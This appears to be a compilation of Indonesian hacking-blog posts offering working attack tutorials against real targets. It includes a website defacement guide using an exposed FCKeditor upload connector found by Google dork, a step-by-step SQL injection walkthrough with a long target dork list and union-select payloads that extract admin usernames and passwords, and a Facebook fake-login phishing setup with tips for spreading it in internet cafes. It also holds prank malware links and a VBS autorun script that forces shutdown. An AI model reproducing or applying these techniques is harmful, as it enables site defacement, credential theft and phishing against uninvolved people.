0 Deface Pendahuluan + Tutor Dasar

maaf sebelumnya kalo ini ga berguna.. :)

hanya memberikan apa yang saya tau kepada teman² semua

OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt
jamin 1 jam dapet min 10 site

maaf sebelumnya kalo ini ga berguna.. :)

hanya memberikan apa yang saya tau kepada teman² semua

OK kali ini saya akan memberikan tutor deface singkat
ada dua.. 1 upload *.html dan 1 lgi upload *.txt

jamin 1 jam dapet min 10 site

[+] exploit : admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
Ok langsung aja yah..
sesuai judul  Upload file

buka google
masukkan dork.. terserah mau gimana caranya
salah satu nya adalah

DORK >>>> intitle:Powered bu Opencart site:.com

cari satu per satu,,
nah, kalo udah dapet target kito coba masukin exploit
ne hasil nya

siph deh bisa :P

1. pada connector pilih PHP
2. lalu pilih file html yang udah kita siapin.. trz klik Upload


Nah tandanya berhasil ato tidah uploadtan kita gini
Lihat SS berikut
“file uploaded with no errors”

OK, udah berhasil di upload.. tapi file kita dimana ya?


Dari data di atas kita bisa lihat file kita ada di “url/[pacth]/file/uli.html”
Example : http://www.upnaturally.com/uli.html

Nah sekarang coba buka di halamna baru url tadi..
Itu lah halaman file yang kita upload tadi

                                 

                                

seep..
kita berhasil masukin file deface an..

nah gie mna udah paham kan gans............^_^

sin dlo darie princess MBT  :*  

0 defence web

Tutorial Text ??

1. silahkan anda cari sendiri website yang bisa dibug melalui google/bing ataupun SQLi Scanner..

2. pilih aja dork listnya:

untuk list dork:
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=

terus misalnya kalo buat deface situs malaysia tinggal tambah site:.my. contoh:
inurl:"news.php?id=" site:.my
buat negara lain juga bisa d ganti.

3. untuk yang pakai manual cek di google/bing:

contoh: http://site.com/index.php?id=1' <- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

berarti Webnya bisa di hack

untuk yang pakai scanner : udah disediain web yang bisa dihack

4. lalu coba anda tambahkan kata: order by 1-- sampai menuju titik error

example:

http://site.com/index.php?id=1 order by 1-- <-- no error

http://site.com/index.php?id=1 order by 2-- <-- no error

http://site.com/index.php?id=1 order by 3-- <-- no error

http://site.com/index.php?id=1 order by 4-- <-- ERROR..!

5. nah yang kita ambil adalah bagian 3-nya (yang error ndak usah)

sekarang coba hapuskan order by 4-- , lalu diganti dengan :

http://site.com/index.php?id=-1 union all select 1,2,3--

(pada bagian warna merah (samping id) dikasih - dan pada setelah angka id, dikasih union all select 1,2,3-- <<-- dimana pada order by tidak terjadi error)

6. nah pasti keluar angka dibagian wesitenya, contoh saya ambil angka 2. lalu coba angka 2 diganti menjadi @@version:

ex:

http://site.com/index.php?id= union all select 1,@@version,3--

7. jika keluar angka versi 5.0.1 comunity log (atau yang lain << yang penting versi 5) berarti lanjutkan

kalau keluar versi 4 tinggalkan saja dan cari web lain..!!

8. nah coba @@version diganti jadi group_concat(table_name) dan disamping union all select 1,2,3 ditambahkan from information_schema.tables where table_schema=database()

ex:

http://site.com/index.php?id= union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--

9. nah disitu keluar beberapa table yang mungkin ada table berisi users ataupun admin. contoh keluar table bernama users, lalu hex kata "users"

1. buka link:  http://www.md5encrypter.com/

2. dibagian string masukan text yang ingin di hex

3. click convert

4. copy hex:

jika sudah maka bagian group_concat(table_name) dan from information_schema.tables where table_schema=database()

diubah menjadi:

- table_name = column_name = group_concat(column_name)

- tables = columns = from information_schema.columns

- table_schema=database() = table_name=0x(tambahkan / paste kata yang di hex tadi) = table_name=0x7573657273

ex:

http://site.com/index.php?id=-1 union all select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273--

10. nah setelah itu akan ad beberapa colum tentang username, password, email, etc.

lalu dibagian group_concat(column_name) . dibagian merah ubah dengan diisikan column username dan password contoh:

group_concat(username,0x3a,password)

<- setiap ingin menambahkan column, tambahkan koma (,) dan 0x3a

lalu ubah: information_schema.columns where table_name=0x7573657273-- dengan nama table yang barusan di hex (contoh yang ini users)

maka from users--

example:

http://site.com/index.php?id=-1 union all select 1,group_concat(username,0x3a,password)3 from users--

11. lalu akan keluar username dan password yang kemungkinan ad username admin dengan password admin

12. silahkan cari sendiri halaman login admin..

13--Good lack---

0 hacking facebook dengan login palsu [fakelogin]

facebook banyak sekali orang yang menggunakannya di indonesia hingga ribuanpun
belum baca cara buat login palsu di friendster? baca dahulu

hack friendster dengan login palsu .

ngehack friendster sudah banyak cara .




seperti yang saya tuliskan judulnya .
kamu bisa membuat login palsu di friendster .
dengan ini kamu bisa mendapatkan email ID dan passwordnya .




untuk tutorialnya silahkan download lewat link ini :

http://www.ziddu.com/download/4580114/hackFS.rar.html

Uploaded Date :	2009-05-03
File Size :	666.34 KB
File Type :	Document

oke langsung saja.

1. silahkan anda daftar di http://www.700megs.commengapa saya suruh anda daftar disana ?
di web hosting sana sangat gratis dan support php juga dari pada di ripway.com
bila tidak bisa terdaftar langsung saja masuk di :
http://www.700megs.com/register.jsp

2. setelah anda berhasil mendaftar di 700megs.com masuk ke FILE MANAGER...hapus file index.html.(akan ada di Cpanel masing2 nantinya)

3. oke, kita mulai praktek kita.
yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
silahkan download scriptnya dahulu
disini atau di
http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.htmlukuran cuma 9kb.4. setelah anda download. Disana ada dua file sebut saja index dan write
kedua-duanya silahkan anda upload di 700megs.com yang tadi anda sudah daftar.
5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana userID dan password yang akan tertampung di facebook fakelogin kamu]

6, alright! selesai sampai di sini. . .

untuk penyebarannya silahkan dengan cara masing2...

disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook mania..
buka file index di www.700megs.com kalian..ambil URL nya.. [penting]

terus untuk pengguna firefox: buka tools>option>main

preview:

disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
boleh di sebar ke komputer temen/di warnet2 kesayangan.

atau..

bisa juga menyebarkan dengan cara seperti ini




kamu buat account baru,di yahoo,gmail,ato sejenisnya

dengan nick Facebook@ or something like that.

diatas cm contoh...silahkan kamu buat seni sendiri
enjoy..

mudahkan ??

semoga berhasil . . .
Untuk Mengoptimalkan Url Phising.
gunakan salah satu cara yang dapat anda baca di snie

0 Cara Mendapatkan Password Operator dan Admin IndoBilling

IndoBilling merupakan software Billing untuk warnet, game online maupun offline, persewaan komputer, kursus, rental pengetikan, laboratorium sekolahan, dll. ---> hasil Googling :D

Nah, kali ini saya dapat artikel dari http://spyrozone.net/ yang akan memandu Anda untuk mendapatkan password Admin dan Operator indoBilling.

Aha.. gini aja dech skenarionya, biar Anda nggak terlalu dosa dan nggak masuk kategori terlalu jahat 

(-_-")

Anda Ngenet di sebuah warnet yang super mahal. Nah, begitu tombol STOP pada billing Anda klik, Anda baru ingat bahwa ada file penting yang belum Anda salin. Mau login lagi.. tentunya ntar kena biaya tambahan dunk karena billing udah berjalan, apalagi jika file yang disalin agak banyak sehingga agak menyita waktu. Nah, jika Anda punya account Operator atau account Admin, Anda bisa login tanpa harus terkena biaya.

.

0 script buka blog muter²

Pastinya Login Terlebih Dahulu
Masuk ke Rancangan Edit HTML >> Edit HTML
Beri tanda Centang pada Expand Template Widget


Letakkan code Berikut ini di atas code <head>

<script>
//<![CDATA[
window.scrollBy(0,0)
window.resizeTo(0,0)
window.moveTo(0,0)
//setInterval("move()",10);
setTimeout("move()", 1);
var mxm=100000
var mym=100000
var mx=100000
var my=100000
var sv=70
var status=1
var szx=0
var szy=0
var c=25
var n=0
var sm=10
var cycle=2
var done=2
function move()
{
if (status == 1)
{
mxm=mxm/1.01
mym=mym/1.01
mx=mx+mxm
my=my-mym
mxm=mxm+(500-mx)/5
mym=mym-(400-my)/5
window.moveTo(mx,my)
rmxm=Math.round(mxm/1)
rmym=Math.round(mym/2)
if (rmxm == 0)
{
if (rmym == 0)
{
status=2
}
}
}
if (status == 2)
{
sv=sv/1.1
scrratio=1+1/3
mx=mx-sv*scrratio/2
my=my-sv/2
szx=szx+sv*scrratio
szy=szy+sv
window.moveTo(mx,my)
window.resizeTo(szx,szy)
if (sv < 0.1)
{
status=3
}
}
if (status == 3)
{
document.fgColor=0xffffFF
c=c-16
if (c<0)
{status=8}
}
if (status == 4)
{
c=c+16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 239)
{status=5}
}
if (status == 5)
{
c=c-16
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c < 0)
{
status=6
cycle=cycle-1
if (cycle > 0)
{
if (done == 1)
{status=7}
else
{status=4}
}
}
}
if (status == 6)
{
document.title = "Cljck"
alert("Cljck")
cycle=2
status=4
done=1
}
if (status == 7)
{
c=c+4
document.bgColor=c*65536
document.fgColor=(255-c)*65536
if (c > 128)
{status=8}
}
if (status == 8)
{
window.moveTo(0,0)
sx=screen.availWidth
sy=screen.availHeight
window.resizeTo(sx,sy)
status=9
}
var timer=setTimeout("move()",0)
}
//]]>
</script>

Simpan Template dan lihat hasilnya ...

0 Software Buat Ngerjain !

Software 1

 dijamin seru banget.. Dan inilah fungsinya :

-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah

1. Puzzle
2. Mouse And Lines

Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee  Silahkan dicoba
Download : http://www.4shared.com/file/sphJ8tz7/140_Joke.html

Software 2

Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu.  Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti iniKarena ini juga ulahnya ni software. Bisa di close kok..
Download :  http://www.4shared.com/file/37YiIUYK/KeyJoke.html

Software 3

Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyak
Download : http://www.4shared.com/file/gA961mVj/InstallStoerung.html

Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini
http://www.rjlpranks.com/pranks/

0 FLASHDISK pake password

Flashdisk

Ingin tahu bangaimana mengamankan isi flashdisk agar tidak dapat dibaca oleh orang lain?

Cara termudah yaitu menggunakan password. Jadi, jika ada seseorang yang menginputkan password salah, maka yang terjadi komputer akan shutdown secara otomatis.

Inilah cara mengamankan isi flashdisk dengan Password:

Buka aplikasi Notepad, caranya bisa dengan Start->All Programs->Accessories->Notepad atau buka RUN ketikkan Notepad dan Enter.

Copy dan paste script berikut ini di Notepad.

on error goto 0
dim s,quest,sd,m,winpath,fs
set sd=createobject(”Wscript.shell”)
set fs=createobject(”Scripting.FileSystemObject”)
set winpath=fs.getspecialfolder(0)
set s=wscript.createobject(”wscript.shell”)
do while quest=”"
quest=inputbox(”Masukkan PASSWORD, Jika anda salah dalam memasukkan password, maka komputer akan shutdown otomatis.”,”http://zonabaru.blogspot.com”)
if quest=”" then
m=MsgBox(”Sorry you don’t have the password…!”, 0+0+48, “http://zonabaru.blogspot.com”)
end if
loop
if quest=”Tulis passwordnya” then
s.run “shutdown -a”
sd.run winpath & “explorer.exe /e,/select, ” & Wscript.ScriptFullname
else
s.run “shutdown -s -t 0″
end if

Tulis password Anda di bagian “Tulis passwordnya”, dan hati-hati dengan huruf besar dan kecil.

Simpan file dengan memilih tipe all files, beri nama “passwordfd.vbs” (tanpa tanda kutip)

Setelah selesai, untuk pengaturan otomatis setelah flashdisk dimasukan di PC, buka Notepad baru lagi, dan copy paste script berikut :

[Autorun]
shellexecute=wscript.exe passwordlock.vbs
action=Flashdisk sudah pakai password

Di bagian script action di atas dapat diubah sesuai dengan keinginan Anda

Simpan file dengan memilih tipe all files, beri nama “autorun.inf” (tanpa tanda kutip)

Kemudian pindahkan kedua file yakni autorun.inf dan passwordfd.vbs ke flashdisk Anda.

Langkah terakhir, sembunyikan file autorun.inf dan passwordfd.vbs dengan cara klik kanan pada masing-masing autorun.inf dan passwordfd.vbs lalu pilih properties centang kotak yang ada di tanda hidden. Selesai.